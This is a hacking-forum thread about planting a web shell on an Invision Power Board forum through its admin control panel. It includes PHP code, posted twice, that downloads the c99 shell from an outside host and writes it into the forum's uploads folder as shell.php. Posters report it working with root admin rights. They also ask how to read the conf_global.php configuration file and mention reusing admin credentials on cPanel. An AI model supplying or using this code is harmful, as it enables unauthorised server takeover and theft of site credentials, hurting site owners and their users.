how to upload shell on invision power board forum?
hi,
i have access to the acp (admin control panel) via admin username and password, i've tried to login to cpanel using the same credentials with the off chance that it might work, but no no avail it never worked.
anyone know how to upload a shell via the acp?
i know its possible with vbulletin forums via the add plugin feature, but i have not found a way to do this with invision power board.
if anyone knows how to or anything about this, it would be much appreciated if you informed me.
cheers |

I've seen this posted here:
Code: | $linky="http://www.evilc0der.com/c99.txt";
$saved="/home/path/towhatever/forum/uploads/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from); |
I've tried that in IPB 2.3.6 Doesnt work
Also tried everything else here and no luck.
Does anyone know if 2.3.5 is different? Or do you have to execute this command with Root admin (not regular admin). |

Ok, This does work. I tried it in a test IPB Install. BUT.. You must execute it as a root admin or else it wont work.
Code: | $linky="http://www.evilc0der.com/c99.txt";
$saved="/home/path/towhatever/forum/uploads/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from); |
So......... does anyone know how to read conf_global.php from the admin panel using basic admin privilege??
[/code] |

The problem is not the IPB version.
There is two different types of Admin users in IPB.
Root admin- (usually UID 1- has complete access to the board/SQL tools)
^---- I don't have this access.
Administrator- (Can access the admin panel, but cant add a shell using the method above or access SQL toolbox)
^--- I do have this access. |
